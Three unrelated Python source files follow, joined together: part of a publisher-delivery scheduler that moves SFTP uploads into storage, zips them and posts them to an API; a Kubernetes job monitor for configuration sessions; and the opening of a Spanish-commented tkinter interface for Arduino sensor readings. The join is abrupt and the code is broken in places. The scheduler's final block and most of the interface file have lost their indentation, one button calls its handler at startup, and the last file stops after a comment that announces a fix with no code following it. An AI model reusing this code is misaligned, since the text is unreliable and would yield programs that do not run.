                if has_xml and os.path.isdir(destination + '/' + stem):
                    shutil.move(depth + '/' + fl, destination + '/' + stem)
                else:
                    shutil.move(depth + '/' + fl, destination)
            except:
                # best effort: a clash at the destination is silently skipped
                pass
# 2016-11-30 TD : routine to peak in flattened packages, looking for a .xml file floating around
def pkgformat(src):
    """Inspect a flattened package folder and guess its packaging format.

    Opens the first .xml file found in *src* and looks for known DTD
    markers; returns the matching DeepGreen packaging format URL, or
    "unknown" when no marker is recognised.
    """
    fmt = "unknown"
    for name in os.listdir(src):
        app.logger.debug('Pkgformat at ' + name)
        if '.xml' not in name:
            continue
        xml_path = src + '/' + name
        app.logger.debug('Pkgformat tries to open ' + xml_path)
        try:
            with open(xml_path, 'r') as handle:
                for line in handle:
                    # NLM/JATS markers both map to the FilesAndJATS format
                    if "//NLM//DTD Journal " in line or "//NLM//DTD JATS " in line:
                        fmt = "https://datahub.deepgreen.org/FilesAndJATS"
                        break
                    if "//RSC//DTD RSC " in line:
                        fmt = "https://datahub.deepgreen.org/FilesAndRSC"
                        break
        except:
            app.logger.info('Pkgformat could not open ' + xml_path)
        # there shall only be *one* .xml as per package
        break
    app.logger.debug('Pkgformat returns ' + fmt)
    return fmt
#
# 2019-07-17 TD : change target of the move operation to the big dg_storage for all deliveries
#
def moveftp():
    """Move freshly uploaded files out of every sftp user jail into the
    publisher storage area (PUBSTOREDIR).

    Each found item is handed to the sudo helper script moveFTPfiles.sh,
    which places it in a unique transaction directory and records it in the
    account's 'pending' directory. Scheduled every MOVEFTP_SCHEDULE minutes
    (default 10); a value of 0 disables the task.
    """
    try:
        # # move any files in the jail of ftp users into the temp directory for later processing
        # tmpdir = app.config.get('TMP_DIR','/tmp')
        pubstoredir = app.config.get('PUBSTOREDIR', '/data/dg_storage')
        userdir = app.config.get('USERDIR', '/home/sftpusers')
        userdirs = os.listdir(userdir)
        app.logger.info("Scheduler - from FTP folders found " + str(len(userdirs)) + " user directories")
        for dir in userdirs:
            # 2019-07-30 TD : One more loop over possible subfolders of the user
            # Please note: They are *exclusively* created by 'createFTPuser.sh'
            # At least, there should be the (old) 'xfer' folder
            founditems = False
            for xfer in os.listdir(userdir + '/' + dir):
                # if len(os.listdir(userdir + '/' + dir + '/xfer')):
                if len(os.listdir(userdir + '/' + dir + '/' + xfer)):
                    founditems = True
                    # for thisitem in os.listdir(userdir + '/' + dir + '/xfer'):
                    for thisitem in os.listdir(userdir + '/' + dir + '/' + xfer):
                        app.logger.info('Scheduler - moving file ' + thisitem + ' for Account:' + dir)
                        # helper script lives next to the service models
                        fl = os.path.dirname(os.path.abspath(__file__)) + '/models/moveFTPfiles.sh'
                        try:
                            newowner = getpass.getuser()
                        except:
                            newowner = 'green'
                        uniqueid = uuid.uuid4().hex
                        # targetdir = tmpdir + '/' + dir
                        # uniquedir = tmpdir + '/' + dir + '/' + uniqueid
                        targetdir = pubstoredir + '/' + dir
                        # 2019-07-17 TD : introduce a new directory that will indicate pending items
                        pendingdir = pubstoredir + '/' + dir + '/pending'
                        uniquedir = pubstoredir + '/' + dir + '/' + uniqueid
                        # moveitem = userdir + '/' + dir + '/xfer/' + thisitem
                        moveitem = userdir + '/' + dir + '/' + xfer + '/' + thisitem
                        #print(" ".join(['sudo', fl, dir, newowner, targetdir, uniqueid, uniquedir, moveitem, pendingdir]))
                        subprocess.call( [ 'sudo', fl, dir, newowner, targetdir, uniqueid, uniquedir, moveitem, pendingdir ] )
            if founditems is False:
                app.logger.debug('Scheduler - found nothing to move for Account:' + dir)
    except:
        app.logger.error("Scheduler - move from FTP failed")
# register with the scheduler unless the frequency is configured as 0 (= disabled)
if app.config.get('MOVEFTP_SCHEDULE',10) != 0:
    schedule.every(app.config.get('MOVEFTP_SCHEDULE',10)).minutes.do(moveftp)
#
# 2019-07-17 TD : process the big delivery/publisher dg_storage for all pending items
#
def copyftp():
    """Copy pending transaction folders from the publisher storage area
    (PUBSTOREDIR/<account>/pending) into TMP_DIR for processing.

    The number of transactions held in TMP_DIR per account is capped by
    MAX_TMPDIR_TRANSACTS_PER_ACC. Scheduled every COPYFTP_SCHEDULE minutes
    (default 10); a value of 0 disables the task.
    """
    try:
        # copy any files in the big delivery/publisher dg_storage into the temp dir for processing
        tmpdir = app.config.get('TMP_DIR','/tmp')
        maxtransacts = app.config.get('MAX_TMPDIR_TRANSACTS_PER_ACC',99)
        pubstoredir = app.config.get('PUBSTOREDIR','/data/dg_storage')
        pubstoredirs = os.listdir(pubstoredir)
        app.logger.info("Scheduler - from DG-STORAGE folders found " + str(len(pubstoredirs)) + " user directories")
        for dir in pubstoredirs:
            # 2019-07-29 TD : check if 'tmpdir/dir' exists at all
            if os.path.exists(tmpdir + '/' + dir) is False:
                os.makedirs(tmpdir + '/' + dir)
            # 2019-07-17 TD : limit temp dir to 100 transactions per account
            if len(os.listdir(tmpdir + '/' + dir)) > maxtransacts:
                app.logger.info('Scheduler - skipping this copy process because len(transactions)>' + str(maxtransacts) + ' in temp directory for Account:' + dir)
                continue
            if len(os.listdir(pubstoredir + '/' + dir + '/pending')):
                for transact in os.listdir(pubstoredir + '/' + dir + '/pending'):
                    # re-check the cap as the temp dir fills up during this loop
                    if len(os.listdir(tmpdir + '/' + dir)) > maxtransacts:
                        break
                    app.logger.info('Scheduler - copying folder of transaction ' + transact + ' for Account:' + dir)
                    src = pubstoredir + '/' + dir + '/pending/' + transact
                    dst = tmpdir + '/' + dir + '/' + transact
                    # subprocess.call( [ 'cp -R', ...] )
                    shutil.rmtree(dst, ignore_errors=True) # target MUST NOT exist!
                    shutil.copytree(src, dst)
                    try:
                        os.remove(src) # try to take the pending symlink away
                    except Exception as e:
                        app.logger.error("Scheduler - failed to delete pending entry: '{x}'".format(x=str(e)))
            else:
                app.logger.debug('Scheduler - currently, nothing to copy for Account:' + dir)
    except:
        app.logger.error("Scheduler - copy from DG-STORAGE failed")
# register with the scheduler unless the frequency is configured as 0 (= disabled)
if app.config.get('COPYFTP_SCHEDULE',10) != 0:
    schedule.every(app.config.get('COPYFTP_SCHEDULE',10)).minutes.do(copyftp)
def processftp():
    """Package and submit every transaction waiting in TMP_DIR.

    For each account directory in TMP_DIR, each transaction (uuid) folder is
    flattened, zipped per publication, and POSTed to the JPER API as an
    unrouted notification; the transaction folder is removed afterwards
    regardless of the POST outcome.
    """
    try:
        # list all directories in the temp dir - one for each ftp user for whom files have been moved from their jail
        userdir = app.config.get('TMP_DIR', '/tmp')
        userdirs = os.listdir(userdir)
        app.logger.debug("Scheduler - processing for FTP found " + str(len(userdirs)) + " temp user directories")
        for dir in userdirs:
            # configure for sending anything for the user of this dir
            apiurl = app.config['API_URL']
            acc = models.Account().pull(dir)
            if acc is None:
                continue
            apiurl += '?api_key=' + acc.data['api_key']
            # there is a uuid dir for each item moved in a given operation from the user jail
            for udir in os.listdir(userdir + '/' + dir):
                thisdir = userdir + '/' + dir + '/' + udir
                app.logger.debug('Scheduler - processing ' + thisdir + ' for Account:' + dir)
                for xpub in os.listdir(thisdir):
                    pub = xpub
                    # should be a dir per publication notification - that is what they are told to provide
                    # and at this point there should just be one pub in here, whether it be a file or directory or archive
                    # if just a file, even an archive, dump it into a directory so it can be zipped easily
                    if os.path.isfile(thisdir + '/' + pub):
                        nf = uuid.uuid4().hex
                        os.makedirs(thisdir + '/' + nf)
                        shutil.move(thisdir + '/' + pub, thisdir + '/' + nf + '/')
                        pub = nf
                    # we don't know the hierarchy of the content, so unpack and
                    # flatten it all; flatten (2019-11-18 TD) also handles bulk
                    # deliveries with more than one publication per zip
                    flatten(thisdir + '/' + pub)
                    # for bulk deliveries flatten leaves one folder per single
                    # publication below <pub>/<pub>; loop over whichever applies
                    pdir = thisdir
                    if os.path.isdir(thisdir + '/' + pub + '/' + pub):
                        pdir = thisdir + '/' + pub + '/' + pub
                    for singlepub in os.listdir(pdir):
                        # 2016-11-30 TD : Since there are (at least!?) 2 formats now available, we have to find out
                        pkg_fmt = pkgformat(pdir + '/' + singlepub)
                        pkg = pdir + '/' + singlepub + '.zip'
                        zip(pdir + '/' + singlepub, pkg)
                        # create a notification and send to the API to join the unroutednotification index
                        notification = {
                            "content": { "packaging_format": pkg_fmt }
                        }
                        files = [
                            ("metadata", ("metadata.json", json.dumps(notification), "application/json")),
                            ("content", ("content.zip", open(pkg, "rb"), "application/zip"))
                        ]
                        app.logger.debug('Scheduler - processing POSTing ' + pkg + ' ' + json.dumps(notification))
                        resp = requests.post(apiurl, files=files, verify=False)
                        if str(resp.status_code).startswith('4') or str(resp.status_code).startswith('5'):
                            app.logger.error('Scheduler - processing completed with POST failure to ' + apiurl + ' - ' + str(resp.status_code) + ' - ' + resp.text)
                        else:
                            app.logger.info('Scheduler - processing completed with POST to ' + apiurl + ' - ' + str(resp.status_code))
                shutil.rmtree(userdir + '/' + dir + '/' + udir, ignore_errors=True) # 2019-12-02 TD : kill "udir" folder no matter what status
    except Exception as e:
        # BUG FIX: a stray `raise` placed before this log line made it
        # unreachable and re-raised into the scheduler loop; log instead,
        # matching the error handling of moveftp()/copyftp()
        app.logger.error('Scheduler - failed scheduled process for FTP temp directories: "{x}"'.format(x=str(e)))
# register with the scheduler unless the frequency is configured as 0 (= disabled)
if app.config.get('PROCESSFTP_SCHEDULE', 10) != 0:
    schedule.every(app.config.get('PROCESSFTP_SCHEDULE', 10)).minutes.do(processftp)
def checkunrouted():
    """Route pending unrouted notifications and optionally delete processed ones.

    Scrolls the unrouted notification index, routes each notification, and -
    depending on the DELETE_ROUTED / DELETE_UNROUTED config flags - bulk
    deletes the ones that were handled. The number processed per run is
    capped to cope with mass deliveries.
    """
    urobjids = []
    robjids = []
    counter = 0
    # 2019-06-13 TD : to cope with mass deliveries, we have to limit the loop
    # over unrouted notifications (factor 5 times the schedule period seems reasonable...)
    limit = app.config.get('CHECKUNROUTED_SCHEDULE',10) * 5
    try:
        app.logger.debug("Scheduler - check for unrouted notifications")
        # query the service.models.unroutednotification index
        # returns a list of unrouted notification from the last three up to four months
        # (note: the redundant re-initialisation of counter was removed)
        for obj in models.UnroutedNotification.scroll():
            counter += 1
            res = routing.route(obj)
            if res:
                robjids.append(obj.id)
            else:
                urobjids.append(obj.id)
            if counter >= limit:
                break
        # 2017-06-06 TD : replace str() by .format() string interpolation
        app.logger.debug("Scheduler - routing sent {cnt} notification(s) for routing".format(cnt=counter))
        if app.config.get("DELETE_ROUTED", False) and len(robjids) > 0:
            app.logger.debug("Scheduler - routing deleting {x} of {cnt} unrouted notification(s) that have been processed and routed".format(x=len(robjids),cnt=counter))
            models.UnroutedNotification.bulk_delete(robjids)
            # 2017-05-17 TD :
            time.sleep(2) # 2 seconds grace time
        if app.config.get("DELETE_UNROUTED", False) and len(urobjids) > 0:
            app.logger.debug("Scheduler - routing deleting {x} of {cnt} unrouted notifications that have been processed and were unrouted".format(x=len(urobjids),cnt=counter))
            models.UnroutedNotification.bulk_delete(urobjids)
            # 2017-05-17 TD :
            time.sleep(2) # again, 2 seconds grace
    except Exception as e:
        app.logger.error("Scheduler - Failed scheduled check for unrouted notifications: cnt={cnt}, len(robjids)={a}, len(urobjids)={b}".format(cnt=counter,a=len(robjids),b=len(urobjids)))
        app.logger.error("Scheduler - Failed scheduled check for unrouted notifications: '{x}'".format(x=str(e)))
# register with the scheduler unless the frequency is configured as 0 (= disabled)
if app.config.get('CHECKUNROUTED_SCHEDULE',10) != 0:
    schedule.every(app.config.get('CHECKUNROUTED_SCHEDULE',10)).minutes.do(checkunrouted)
def monthly_reporting():
    """Update the yearly CSV report of notifications delivered to institutions.

    python schedule does not actually handle months, so this runs every day
    and uses a tracker file to detect whether the current month has rolled
    over; the delivery report is generated only once per month.
    """
    try:
        app.logger.debug('Scheduler - Running monthly reporting')
        # create / update a monthly deliveries by institution report
        # it should have the columns HEI, Jan, Feb...
        # and rows are HEI names then count for each month
        # finally ends with sum total (total of all numbers above)
        # and unique total (total unique objects accessed - some unis may have accessed the same one)
        # query the retrieval index to see which institutions have retrieved content from the router in the last month
        month = datetime.datetime.now().strftime("%B")[0:3]
        year = str(datetime.datetime.now().year)
        app.logger.debug('Scheduler - checking monthly reporting for ' + month + ' ' + year)
        reportsdir = app.config.get('REPORTSDIR','/home/green/jper_reports')
        if not os.path.exists(reportsdir): os.makedirs(reportsdir)
        monthtracker = reportsdir + '/monthtracker.cfg'
        try:
            # "with" guarantees the tracker file is closed even on a read error
            with open(monthtracker,'r') as lm:
                lastmonth = lm.read().strip('\n')
        except:
            # first run: create an empty tracker file so the next read succeeds
            with open(monthtracker,'w'):
                pass
            lastmonth = ''
        if lastmonth != month:
            app.logger.debug('Scheduler - updating monthly report of notifications delivered to institutions')
            with open(monthtracker,'w') as lmm:
                lmm.write(month)
            # get the month number that we are reporting on
            tmth = datetime.datetime.utcnow().month - 1
            # if the month is zero, it means the year just rolled over
            if tmth == 0:
                tmth = 12
                lastyear = int(year) - 1
                frm = str(lastyear) + "-" + str(tmth) + "-01T00:00:00Z"
                to_date = str(year) + "-01-01T00:00:00Z"
            else:
                # zero-pad single digit months for the ISO date strings
                mnthstr = str(tmth) if tmth > 9 else "0" + str(tmth)
                nexmnth = str(tmth + 1) if tmth + 1 > 9 else "0" + str(tmth + 1)
                frm = str(year) + "-" + mnthstr + "-01T00:00:00Z"
                if tmth == 12:
                    nextyear = int(year) + 1
                    to_date = str(nextyear) + "-01-01T00:00:00Z"
                else:
                    to_date = str(year) + "-" + nexmnth + "-01T00:00:00Z"
            # specify the file that we're going to output to
            reportfile = reportsdir + '/monthly_notifications_to_institutions_' + year + '.csv'
            # run the delivery report
            reports.delivery_report(frm, to_date, reportfile)
        # necessary tasks for other monthly reporting could be defined here
        # reporting that has to run more regularly could be defined as different reporting methods altogether
        # and controlled with different settings in the config
    except Exception as e:
        app.logger.error("Scheduler - Failed scheduled reporting job: '{x}'".format(x=str(e)))
# register only when explicitly enabled in config
if app.config.get('SCHEDULE_MONTHLY_REPORTING',False):
    schedule.every().day.at("00:05").do(monthly_reporting)
def delete_old_routed():
    """Delete the monthly 'routed' index that has aged out of retention.

    Runs daily; only actually removes an index on the first days after a
    month rolls out of the SCHEDULE_KEEP_ROUTED_MONTHS window - on other
    days the DELETE simply targets an index that is already gone.
    """
    app.logger.info('Scheduler - checking for old routed indexes to delete')
    try:
        # each day send a delete to the index name that is beyond the range of those to keep
        # index names look like routed201601
        # so read from config how many months to keep, and add 1 to it
        # so if in March, and keep is 3, then it becomes 4
        keep = app.config.get('SCHEDULE_KEEP_ROUTED_MONTHS',3) + 1
        year = datetime.datetime.utcnow().year
        # subtracting the keep gives us a month of -1 if now March
        month = datetime.datetime.utcnow().month - keep
        if month < 1:
            # so roll back the year, and set the month to 11 (if now March)
            year = year - 1
            month = 12 + month
        # so idx would look like routed201511 if now March - meaning we would keep Dec, Jan, and Feb (and Mar currently in use of course)
        # BUG FIX: zero-pad the month - unpadded names (e.g. 'routed20162' for
        # February) never match the real 'routed201602'-style index names, so
        # indexes for months 1-9 were never deleted
        idx = 'routed' + str(year) + str(month).zfill(2)
        addr = app.config['ELASTIC_SEARCH_HOST'] + '/' + app.config['ELASTIC_SEARCH_INDEX'] + '/' + idx
        app.logger.debug('Scheduler - sending delete to ' + addr)
        # send the delete - at the start of a month this would delete an index. Other days it will just fail
        requests.delete(addr)
    except Exception as e:
        app.logger.error("Scheduler - Failed monthly routed index deletion: '{x}'".format(x=str(e)))
# register only when explicitly enabled in config
if app.config.get('SCHEDULE_DELETE_OLD_ROUTED',False):
    schedule.every().day.at("03:00").do(delete_old_routed)
def cheep():
    """Debug heartbeat: log and print a short message.

    Not scheduled by default; uncomment the schedule line below to enable.
    """
    app.logger.debug("Scheduled cheep")
    print("Scheduled cheep")
#schedule.every(1).minutes.do(cheep)
def run():
    """Blocking scheduler loop: execute pending jobs forever, polling each second."""
    while True:
        schedule.run_pending()
        time.sleep(1)
def go():
    """Run the scheduler loop on a background thread.

    The thread is marked as a daemon before starting, so it will not
    keep the interpreter alive at shutdown.
    """
    worker = Thread(target=run, daemon=True)
    worker.start()
if __name__ == "__main__":
initialise()
print("starting scheduler")
app.logger.debug("Scheduler - starting up directly in own process.")
run()
|
job_events.py | # Copyright 2019-2021 Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# (MIT License)
"""
Functions for handling Job Events related to CFS.
"""
import logging
import threading
import time
from requests.exceptions import HTTPError
from kubernetes import config, client
from kubernetes.client.rest import ApiException
from kubernetes.config.config_exception import ConfigException
import cray.cfs.operator.cfs.sessions as cfs_sessions
# Kubernetes client configuration: use the in-cluster service account when
# running as a pod, falling back to the local kubeconfig for development.
try:
    config.load_incluster_config()
except ConfigException:  # pragma: no cover
    config.load_kube_config()  # Development
# Shared client for the Kubernetes batch (Job) API.
_api_client = client.ApiClient()
k8s_jobs = client.BatchV1Api(_api_client)
# Module-level logger for job event handling.
LOGGER = logging.getLogger('cray.cfs.operator.events.job_events')
class CFSJobMonitor:
    """Watches the Kubernetes Jobs backing CFS sessions and syncs job state
    back into the CFS session records.

    run() starts two background threads: one polls monitored sessions for
    job completion (and periodically re-syncs against CFS), the other
    removes orphaned cray-cfs-aee Jobs no longer referenced by any session.
    """

    def __init__(self, env):
        # Namespace the CFS session jobs run in.
        self.namespace = env['RESOURCE_NAMESPACE']
        # Map of session name -> session record for sessions being monitored.
        self.sessions = {}

    def _sync_sessions(self):
        """Start monitoring incomplete sessions that have a job but are not yet tracked."""
        # Load incomplete and unmonitored sessions
        session_list = cfs_sessions.get_sessions()
        for session in session_list:
            session_status = session.get('status', {}).get('session', {})
            if session['name'] not in self.sessions and \
                    session_status.get('job') and \
                    not session_status.get('status') == 'complete':
                self.add_session(session)

    def _run(self):  # pragma: no cover
        """Monitor loop: check sessions every 30s; re-sync roughly every 5 minutes."""
        intervals = 0
        while True:
            try:
                self.monitor_sessions()
                if intervals >= 10:
                    # Periodically check for out of sync sessions
                    self._sync_sessions()
                    intervals = 0
            except Exception as e:
                LOGGER.warning('Exception monitoring sessions: {}'.format(e))
            intervals += 1
            time.sleep(30)

    def _run_cleanup(self):  # pragma: no cover
        """Cleanup loop: remove orphaned jobs once per hour."""
        while True:
            try:
                self.cleanup_jobs()
                time.sleep(60*60)
            except Exception as e:
                LOGGER.warning('Exception running cleanup: {}'.format(e))

    def run(self):  # pragma: no cover
        """Do the initial session sync (retrying until it succeeds), then
        start the monitor and cleanup threads."""
        while True:
            try:
                self._sync_sessions()
            except Exception as e:
                LOGGER.warning('Exception during initial session sync: {}'.format(e))
                time.sleep(30)
            else:
                break
        threading.Thread(target=self._run).start()
        threading.Thread(target=self._run_cleanup).start()

    def monitor_sessions(self):
        """Check all monitored sessions and stop tracking those whose job completed."""
        try:
            completed_sessions = []
            # Use list(keys()) rather than .items() so that other threads can edit dict
            for name in list(self.sessions.keys()):
                if self.session_complete(self.sessions[name]):
                    completed_sessions.append(name)
            for name in completed_sessions:
                self.remove_session(name)
        except Exception as e:
            LOGGER.error('Exception encountered while monitoring jobs: {}'.format(e))

    def cleanup_jobs(self):
        """Delete cray-cfs-aee jobs that are not referenced by any session."""
        try:
            jobs = self.get_jobs()
            sessions = cfs_sessions.get_sessions()
            session_jobs = self.get_session_jobs(sessions)
            i = 0
            for job in jobs:
                if job not in session_jobs:
                    self.delete_job(job)
                    i += 1
            if i:
                LOGGER.info('Cleanup removed {} orphaned cfs jobs'.format(i))
        except Exception as e:
            LOGGER.warning('Exception encountered while cleaning jobs: {}'.format(e))

    def add_session(self, session):
        """Begin monitoring *session* (a CFS session record)."""
        self.sessions[session['name']] = session

    def remove_session(self, session_name):
        """Stop monitoring the named session (no-op if it is not monitored)."""
        self.sessions.pop(session_name, None)

    def session_complete(self, session):
        """Return True when the session's job is finished (or session/job is
        gone), updating the CFS session status as a side effect."""
        session_name = session['name']
        if self._session_missing(session_name):
            # BUG FIX: the placeholder was never filled in, so the session
            # name was missing from the warning
            LOGGER.warning('Session {} was being monitored but can no longer be found'.format(session_name))
            return True
        job_name = session['status']['session'].get('job')
        if not job_name:
            # This shouldn't be able to happen.
            # Session jobs are only monitored if the job has been created.
            LOGGER.warning('No job is specified for session {}. This is an invalid state.'.format(
                session['name']))
            return True
        try:
            job = k8s_jobs.read_namespaced_job(job_name, self.namespace)
        except ApiException as e:
            if getattr(e, 'status', None) == 404:
                LOGGER.warning('Job was deleted before CFS could determine success.')
                cfs_sessions.update_session_status(session_name, data={'status': 'complete',
                                                                       'succeeded': 'unknown'})
                return True
            else:
                # BUG FIX: the exception was passed without a matching %s
                # placeholder, which breaks the log formatting
                LOGGER.warning("Unable to fetch Job=%s: %s", job_name, e)
                return False
        session_status = session.get('status', {}).get('session', {})
        if job.status.start_time and session_status.get('status') == 'pending':
            LOGGER.info("EVENT: JobStart %s", session_name)
            cfs_sessions.update_session_status(session_name, data={'status': 'running'})
            # Set so that update_session_status is not called again for status
            session_status['status'] = 'running'
        if job.status.completion_time:
            LOGGER.info("EVENT: JobComplete %s", session_name)
            completion_time = job.status.completion_time.isoformat().split('+')[0]
            cfs_sessions.update_session_status(session_name,
                                               data={'status': 'complete',
                                                     'succeeded': 'true',
                                                     'completionTime': completion_time})
            return True
        elif job.status.failed:
            LOGGER.info("EVENT: JobFail %s", session_name)
            completion_time = job.status.conditions[0].last_transition_time
            completion_time = completion_time.isoformat().split('+')[0]
            cfs_sessions.update_session_status(session_name,
                                               data={'status': 'complete',
                                                     'succeeded': 'false',
                                                     'completionTime': completion_time})
            return True
        return False

    def _session_missing(self, session_name):
        """Return True when CFS no longer knows the named session (HTTP 404)."""
        try:
            cfs_sessions.get_session(session_name)
        except HTTPError as e:
            if e.response.status_code == 404:
                return True
        return False

    def get_session_jobs(self, sessions):
        """Return the job names referenced by the given session records."""
        jobs = []
        for session in sessions:
            job_name = session['status']['session'].get('job')
            if job_name:
                jobs.append(job_name)
        return jobs

    def get_jobs(self):
        """Return the names of all cray-cfs-aee jobs in our namespace."""
        jobs = k8s_jobs.list_namespaced_job(self.namespace,
                                            label_selector='app.kubernetes.io/name=cray-cfs-aee')
        job_names = [job.metadata.name for job in jobs.items]
        return job_names

    def delete_job(self, job_name):
        """Delete the named Kubernetes job in our namespace."""
        k8s_jobs.delete_namespaced_job(job_name, self.namespace)
|
ui.py | from ctypes import sizeof
from logging import disable
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from tkinter.font import Font
from datetime import date
from datetime import datetime as dtime
from openpyxl import load_workbook
from openpyxl.utils import *
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
from openpyxl.workbook.workbook import Workbook
import serial.tools.list_ports
import serial
from threading import *
import time
import numpy as np
# Serial communication object (to connect with the Arduino); the port is
# assigned later, before opening the connection.
ser = serial.Serial(baudrate=115200, timeout=2)
#Creamos clase para Objeto que genera y maneja la UI (Interfaz de Usuario) y su funcionalidad.
class UI:
#Inicializa el objeto, requiere una hoja de excel como argumento.
def __init__(self, master, wb, ser):
#Crea variable interna para controlar el libro y la hoja de excel.
self.wb = wb
self.sheet = self.wb.active
#Crea variable interna para Objeto Serial. Crea variable para el root de TKInter y asigna titulo.
self.ser = ser
self.master = master
self.master.title("Interfaz")
#Crea un contenedor para la pagina principal (Frame).
self.First = Frame(self.master)
#Crea y configura contenedor para sensores.
Top = LabelFrame(self.First, text="Lectura de sensores", bd=2)
Top.grid(columnspan=5, padx=10, pady=15, ipadx=2, ipady=2)
#Crea figura para contener las graficas.
self.fig = Figure(dpi= 50, facecolor='Black', constrained_layout=True)
#Crea y configura un area de dibujo de TKinter para contener la figura.
self.cs1 = FigureCanvasTkAgg(self.fig, master=Top)
self.cs1.draw()
self.cs1.get_tk_widget().grid(row=0, column=1, rowspan=4, sticky=E)
#Crea y configura Labels para contener el valor actual.
self.sLabel1 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel1.grid(row=0, column=3, sticky=E, pady=4, padx=5)
self.sLabel2 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel2.grid(row=1, column=3, sticky=E, pady=4, padx=5)
self.sLabel3 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel3.grid(row=2, column=3, sticky=E, pady=4, padx=5)
self.sLabel4 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel4.grid(row=3, column=3, sticky=E, pady=4, padx=5)
#Crea Etiquetas para identificar las graficas.
ls1 = Label(Top, text="Sensor 1", font=("Verdana",18))
ls1.grid(row=0, column=0, sticky=E, pady=4, padx=5)
#Crea y define Boton para el Sensor 2.
ls2 = Label(Top, text="Sensor 2", font=("Verdana",18))
ls2.grid(row=1, column=0, sticky=E, pady=4, padx=5)
#Crea y define Boton para el Sensor 3.
ls3 = Label(Top, text="Sensor 3", font=("Verdana",18))
ls3.grid(row=2, column=0, sticky=E, pady=4, padx=5)
#Crea y define Boton para el Sensor 4.
ls4 = Label(Top, text="Sensor 4", font=("Verdana",18))
ls4.grid(row=3, column=0, sticky=E, pady=4, padx=5)
#Crea y define texto y dropdown menu del contador de minutos.
lsample = Label(self.First, text="Tiempo de muestreo", highlightthickness=0)
lsample.grid(row=1, column=0)
self.spin = Spinbox(self.First, from_= 0, to = 60, wrap = True, width=2, highlightthickness=0, border=0, font=Font(family='Helvetica', size=9, weight='normal'))
self.spin.delete(0,"end")
self.spin.insert(0,5)
self.spin.grid(row=1,column=1, sticky=W)
lmin = Label(self.First, text="minutos", highlightthickness=0)
lmin.grid(row=1, column=1)
#Crea y define Botones de funciones y manda llamar sus respectivas subrutinas.
self.breport = Button(self.First, text="Reporte", width=10, height=2, command= lambda : self.deactivate() & self.report())
self.breport.grid(row=2, column=0, padx=35, pady=10)
self.bstop = Button(self.First, text="Desconectar", width=10, height=2, command=self.ser.close())
self.bstop.grid(row=2, column=1, padx=55, pady=5)
self.bresume = Button(self.First, text="Continuar", width=10, height=2, command= lambda : self.deactivate() & self.connectSerial())
self.bresume.grid(row=2, column=2, padx=35, pady=5)
#Asigna contenedor a la pantalla principal (default).
self.First.grid()
#Builds the report dialog: a Toplevel (second screen brought to the front)
#with the date-range options used to generate the report.
def report(self):
    """Open the report dialog with default from/to dates (last ~5 days)."""
    self.Second = Toplevel(self.master)
    # Label frame holding the date-range widgets.
    frame = LabelFrame(self.Second, text="Parametros de reporte")
    frame.grid(row=0, column=0, columnspan=3, padx=15, pady=10)
    flab = Label(frame, text="Desde: ")
    flab.grid(row=1 , column=0, pady=0, padx=20)
    tlab = Label(frame, text="hasta: ")
    tlab.grid(row=2 , column=0, pady=10, padx=20)
    # Default "to" date is today (shared IntVars declared at module level).
    d = date.today()
    dia.set(d.day)
    mes.set(d.month)
    # Default "from" date is 5 days earlier; when that crosses a month
    # boundary, approximate with 30-day months (25 + current day, previous
    # month), e.g. Feb 3 -> Jan 28.
    if d.day > 5:
        ddia.set(d.day-5)
        mmes.set(d.month)
    else:
        ddia.set(25+d.day)
        mmes.set(d.month-1)
    anio.set(d.year)
    # Column headers for the spinboxes.
    dlab = Label(frame, text="Dia")
    dlab.grid(row=0, column=1, pady=2, padx=10)
    mlab = Label(frame, text="Mes")
    mlab.grid(row=0, column=2, pady=2, padx=10)
    alab = Label(frame, text="Año")
    alab.grid(row=0, column=3, pady=2, padx=10)
    # "From" date spinboxes, seeded with the defaults computed above.
    self.fdia = Spinbox(frame, from_= 0, to = 31, wrap = True, width=4, textvariable=ddia, font=Font(family='Helvetica', size=9, weight='normal'))
    self.fdia.grid(row=1, column=1, pady=5, padx=10)
    self.fmes = Spinbox(frame, from_= 0, to = 12, wrap = True, width=4, textvariable=mmes, font=Font(family='Helvetica', size=9, weight='normal'))
    self.fmes.grid(row=1, column=2, pady=5)
    self.fanio = Spinbox(frame, from_= 2021, to = 2022, wrap = True, width=4, textvariable=anio, font=Font(family='Helvetica', size=9, weight='normal'))
    self.fanio.grid(row=1, column=3, pady=5, padx=10)
    # "To" date spinboxes.
    self.sdia = Spinbox(frame, from_= 0, to = 31, wrap = True, width=4, textvariable=dia, font=Font(family='Helvetica', size=9, weight='normal'))
    self.sdia.grid(row=2 , column=1, pady=5, padx=10)
    self.smes = Spinbox(frame, from_= 0, to = 12, wrap = True, width=4, textvariable=mes, font=Font(family='Helvetica', size=9, weight='normal'))
    self.smes.grid(row=2 , column=2, pady=5)
    self.sanio = Spinbox(frame, from_= 2021, to = 2022, wrap = True, width=4, textvariable=anio, font=Font(family='Helvetica', size=9, weight='normal'))
    self.sanio.grid(row=2 , column=3, pady=5, padx=10)
    # Export / cancel buttons.  fix: the originals used `A() & B()`, which
    # evaluates both calls but then raises TypeError on their None/'' return
    # values inside the Tk callback; a tuple expression runs both cleanly.
